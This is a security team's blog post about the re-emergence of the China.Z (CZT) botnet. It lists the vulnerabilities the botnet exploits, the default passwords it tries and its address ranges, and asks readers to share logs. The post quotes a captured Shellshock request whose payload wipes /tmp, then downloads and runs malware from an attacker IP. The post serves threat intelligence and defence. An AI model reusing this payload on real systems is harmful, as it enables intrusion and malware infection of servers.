🕒 Reading Time: 3 minutes

 Re-emergence of an old threat

 

Good Afternoon!

Over the past couple weeks, we have been tracking a possible re-emergence of a threat group originating from China: CZT. The security team here at CARI.net has done extensive research on this threat and is continuing to work with leading security companies as well as government agencies to verify, track and hopefully put an end to this new threat.

Starting in mid-November, there has been batches of requests that resemble the following:
222.186.21.115 - - [16/Mar/2015:07:00:56 -0700] "GET / HTTP/1.1" 200 13411 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.21.115:999/udso -O /tmp/China.Z-wqpw\xd0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wqpw\xd0 >> /tmp/Run.sh;echo /tmp/China.Z-wqpw\xd0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.21.115:999/udso -O /tmp/China.Z-wqpw\xd0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wqpw\xd0 >> /tmp/Run.sh;echo /tmp/China.Z-wqpw\xd0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

MalwareMustDie did an excellent write up of the malware in January (found here). However, it appears that this is not the only threat that this actor is actively involved in. There is another write up of the bot from November (found here).

It appears that shellshock is just the tip of the iceberg. It also is readily apparent that this group has come back with a vengeance. Thanks to the continuing cooperation and gracious dedication of logs from John Matherly at Shodan, Mark Schloesser and HD Moore at Rapid7 and Patrick Gates at OddLot Creative, we have been able to track other vectors that CZT are using. CZT appears to exploit the following:

  • Elasticsearch (CVE-2014-3120) targeting port 80,8080, and 9200
  • JBoss (Various CVEs) targeting a range of ports including 8081,8090,8091,9999,4445 and 9901
  • Struts (CVE-2013-2251) primarily targeting 80, 8080, and 443
  • Tomcat (unknown vector) targeting 80, 8080 and 443.
  • RTSP devices (unknown vector) targeting port 554
  • MongoDB (CVE-2014-4650) targeting 27017
 

In addition to the software exploits, this new threat appears to be looking for several default user/password combinations, including admin/admin, root/admin, root/root and admin/root. There are several other combinations, but these are vendor specific. We will be contacting the appropriate vendors in order to facilitate awareness amongst their clients. The total infection rate for software exploits is no lower than 11k, and we have confirmed a probable 9k of devices with default passwords on public interfaces.

At this time the CARISIRT team has located 10 controllers, and have been monitoring and downloading all malware, files and logs generated by this group. They are constantly updating and changing code as well as webserver locations. We are still in the process of notifying owners of compromised hosts, law enforcement agencies as well as other security teams. Due to the number of compromised hosts, and the availability of the data on public interfaces we are not yet ready to release all the information that we have gathered.


CARISIRT analyzing captured botnet control software.
CARISIRT analyzing captured botnet control software.

Get Involved

 

Due to the way that CZT organizes target scanning, it’s difficult to verify configuration and log files we have scraped from their controllers to actual target log files. We are requesting any logs, malware samples or interesting traffic originating from AS23650, specifically 222.186.0.0/16. Also, any logs regarding /_search?pretty, /manager/html/, login.action, or any Shellshock entries that mention the term “ChinaZ” would be greatly appreciated. If you have been or fear you may be compromised by this threat, please let us know. Any information provided will be kept in confidence, unless given permission by submitter for reuse. If you have these logs and would like to help out, please shoot us an email at sirt@cari.net.

 

We will be releasing our full report in the following weeks. For any additional information, please contact us at sirt@cari.net and a member of our security team will get back to you shortly. Thanks for reading and have a great day!

Regards,

Zachary Wikholm Head Of Security Incident Response Team (CARISIRT) sirt@cari.net CARI.net